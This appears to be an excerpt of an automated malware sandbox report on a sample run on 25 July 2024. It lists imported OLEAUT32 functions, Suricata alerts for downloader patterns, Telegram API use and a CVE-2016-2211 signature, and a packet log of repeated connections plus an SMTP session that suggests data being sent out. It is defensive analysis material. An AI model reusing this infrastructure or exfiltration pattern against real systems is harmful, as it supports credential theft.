                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                      2024-07-25T03:35:25.760755+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49737443192.168.2.5188.114.97.3
                                      2024-07-25T03:34:53.126997+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49730443192.168.2.5188.114.97.3
                                      2024-07-25T03:34:35.748211+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970480192.168.2.5158.101.44.242
                                      2024-07-25T03:34:48.130043+0200TCP2033967ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)49721443192.168.2.5149.154.167.220
                                      2024-07-25T03:34:50.357572+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4972280192.168.2.5158.101.44.242
                                      2024-07-25T03:35:33.045497+0200TCP2045615ET HUNTING Telegram API Request (GET)49749443192.168.2.5149.154.167.220
                                      2024-07-25T03:34:48.376956+0200TCP2045615ET HUNTING Telegram API Request (GET)49721443192.168.2.5149.154.167.220
                                      2024-07-25T03:35:03.937735+0200TCP2033967ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)49735443192.168.2.5149.154.167.220
                                      2024-07-25T03:34:48.133134+0200TCP2029322ET HUNTING Telegram API Certificate Observed44349721149.154.167.220192.168.2.5
                                      2024-07-25T03:35:32.797219+0200TCP2033967ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)49749443192.168.2.5149.154.167.220
                                      2024-07-25T03:34:38.114931+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49706443192.168.2.5188.114.97.3
                                      2024-07-25T03:34:47.487230+0200UDP2033966ET HUNTING Telegram API Domain in DNS Lookup5625253192.168.2.51.1.1.1
                                      2024-07-25T03:35:29.798578+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974340.127.169.103192.168.2.5
                                      2024-07-25T03:34:46.149772+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49718443192.168.2.5188.114.97.3
                                      2024-07-25T03:34:38.826388+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970780192.168.2.5158.101.44.242
                                      2024-07-25T03:35:50.131796+0200TCP2033967ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)49751443192.168.2.5149.154.167.220
                                      2024-07-25T03:34:41.435747+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971180192.168.2.5158.101.44.242
                                      2024-07-25T03:34:42.701479+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971380192.168.2.5158.101.44.242
                                      2024-07-25T03:34:37.513826+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970480192.168.2.5158.101.44.242
                                      2024-07-25T03:35:32.797234+0200TCP2029322ET HUNTING Telegram API Certificate Observed44349749149.154.167.220192.168.2.5
                                      2024-07-25T03:34:40.138843+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4970980192.168.2.5158.101.44.242
                                      2024-07-25T03:34:52.576337+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4972280192.168.2.5158.101.44.242
                                      2024-07-25T03:34:53.757840+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973280192.168.2.5158.101.44.242
                                      2024-07-25T03:34:51.655172+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972320.12.23.50192.168.2.5

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 25, 2024 03:34:34.923317909 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:34.928530931 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:34.928625107 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:34.928858042 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:34.933633089 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:35.529810905 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:35.534837961 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:35.539709091 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:35.705096006 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:35.748210907 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:36.262422085 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.262459993 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:36.262526035 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.278085947 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.278115034 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:36.776668072 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:36.776878119 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.783600092 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.783620119 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:36.783992052 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:36.826345921 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.827919960 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:36.872503996 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.275305986 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.275398970 CEST44349705188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.275604963 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.289681911 CEST49705443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.297250986 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:37.303500891 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:37.468378067 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:37.471757889 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.471806049 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.471884012 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.472156048 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.472167015 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.513825893 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:37.958990097 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:37.965099096 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:37.965131044 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:38.115020037 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:38.115279913 CEST44349706188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:38.115380049 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:38.115709066 CEST49706443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:38.125745058 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:38.130844116 CEST8049704158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:38.130943060 CEST4970480192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:38.136288881 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:38.141104937 CEST8049707158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:38.141190052 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:38.141247988 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:38.145989895 CEST8049707158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:38.774713039 CEST8049707158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:38.775868893 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:38.775917053 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:38.775999069 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:38.776216984 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:38.776226044 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:38.826387882 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.263926029 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.266625881 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:39.266655922 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.402898073 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.403146982 CEST44349708188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:39.403201103 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:39.403552055 CEST49708443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:39.411794901 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.412985086 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417496920 CEST8049707158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:39.417552948 CEST4970780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417728901 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:39.417865992 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.417939901 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:39.422688961 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.090599060 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.091881037 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.091979027 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.092087030 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.092387915 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.092421055 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.138843060 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.601875067 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.603908062 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.603935003 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739665031 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739754915 CEST44349710188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:40.739814997 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.740225077 CEST49710443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:40.744285107 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.745201111 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.750618935 CEST8049709158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.750701904 CEST4970980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.751069069 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:40.751137018 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.751226902 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:40.756920099 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:41.385307074 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:41.386740923 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.386854887 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.386944056 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.387196064 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.387227058 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.435746908 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:41.870505095 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:41.872325897 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:41.872361898 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030210018 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030308008 CEST44349712188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.030405998 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.030905962 CEST49712443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.038129091 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.039304018 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.043634892 CEST8049711158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.043747902 CEST4971180192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.044154882 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.044245005 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.044313908 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:42.049148083 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.646853924 CEST8049713158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:42.648602009 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648653030 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.648751020 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648988008 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:42.648998976 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:42.701478958 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.131699085 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.133347034 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.133368969 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291415930 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291522026 CEST44349714188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.291632891 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.292226076 CEST49714443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.296685934 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.301572084 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.301704884 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.305710077 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:43.310466051 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.904547930 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:43.906037092 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906074047 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.906167984 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906389952 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:43.906404972 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:43.951498985 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.475282907 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.477238894 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.477257967 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.822457075 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.822563887 CEST44349716188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:44.822613955 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.823050022 CEST49716443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:44.827999115 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.829904079 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.834839106 CEST8049715158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:44.834909916 CEST4971580192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.836348057 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:44.836411953 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.836606026 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:44.843072891 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:45.479860067 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:45.481105089 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481206894 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.481307030 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481591940 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.481643915 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.529498100 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:45.991483927 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:45.993325949 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:45.993392944 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149796963 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149892092 CEST44349718188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.149997950 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.150448084 CEST49718443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.153193951 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.154320955 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.158529997 CEST8049717158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.158611059 CEST4971780192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.159277916 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.159414053 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.159454107 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:46.164283037 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.787453890 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:46.788675070 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.788713932 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.788794041 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.789057016 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:46.789064884 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:46.841979027 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.275561094 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.284931898 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.284951925 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409512997 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409826994 CEST44349720188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:47.409914970 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.414412975 CEST49720443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:47.486521959 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.492280960 CEST8049719158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:47.492399931 CEST4971980192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:47.494827986 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.494869947 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:47.494931936 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.495394945 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:47.495407104 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.129789114 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.130043030 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.133126974 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.133133888 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.133429050 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.134857893 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.180500984 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377054930 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377217054 CEST44349721149.154.167.220192.168.2.5
                                      Jul 25, 2024 03:34:48.377286911 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:48.381295919 CEST49721443192.168.2.5149.154.167.220
                                      Jul 25, 2024 03:34:49.105386019 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.110558987 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:49.114392042 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.139708996 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:49.145998001 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.102118969 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.112905025 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:50.117710114 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.316365004 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:50.357572079 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:50.793932915 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.793981075 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:50.794049978 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.807050943 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:50.807080984 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.320550919 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.320631981 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.322236061 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.322268963 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.322573900 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.372153044 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.485009909 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.528515100 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603324890 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603403091 CEST44349724188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:51.603457928 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.606511116 CEST49724443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:51.615945101 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:51.620852947 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:52.521858931 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:52.524322033 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524358034 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:52.524430990 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524701118 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:52.524715900 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:52.576337099 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:52.995065928 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.003810883 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.003830910 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127058983 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127263069 CEST44349730188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.127329111 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.127659082 CEST49730443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.133786917 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.135143042 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.139234066 CEST8049722158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.139337063 CEST4972280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.140136957 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.140208960 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.140341043 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.145106077 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.756190062 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.757839918 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:53.758815050 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.758851051 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.759176970 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.759432077 CEST49733443192.168.2.5188.114.97.3
                                      Jul 25, 2024 03:34:53.759443998 CEST44349733188.114.97.3192.168.2.5
                                      Jul 25, 2024 03:34:53.763258934 CEST8049732158.101.44.242192.168.2.5
                                      Jul 25, 2024 03:34:53.763331890 CEST4973280192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:54.496959925 CEST4971380192.168.2.5158.101.44.242
                                      Jul 25, 2024 03:34:55.211016893 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:55.215919018 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:55.216092110 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:56.707880020 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:56.710510015 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:56.715375900 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.057641029 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.059765100 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.064641953 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.406399965 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.406769037 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.411664009 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.776628017 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:57.778599977 CEST49734587192.168.2.5118.69.190.131
                                      Jul 25, 2024 03:34:57.783458948 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:58.125503063 CEST58749734118.69.190.131192.168.2.5
                                      Jul 25, 2024 03:34:58.125696898 CEST49734587192.168.2.5118.69.190.131
